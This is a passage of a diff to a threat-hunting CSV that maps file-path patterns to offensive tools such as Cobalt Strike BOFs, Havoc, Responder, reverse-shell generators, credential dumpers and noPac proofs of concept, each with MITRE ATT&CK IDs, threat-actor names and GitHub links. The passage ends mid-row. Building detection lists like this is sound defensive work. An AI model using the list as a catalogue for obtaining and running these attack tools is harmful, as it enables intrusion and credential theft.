T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/remotereg.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remotereg.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remoteshell.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*/resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/resources/PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/resources/selfdestruction*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/Responder/Responder.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/Responder/Responder.conf*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/returnvar/wce/*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2271","510","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" "*/rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ricardojba/Invoke-noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*/ricardojba/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ridenum/ridenum.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Ridter/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*/rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" +"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" "*/rockyou.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - 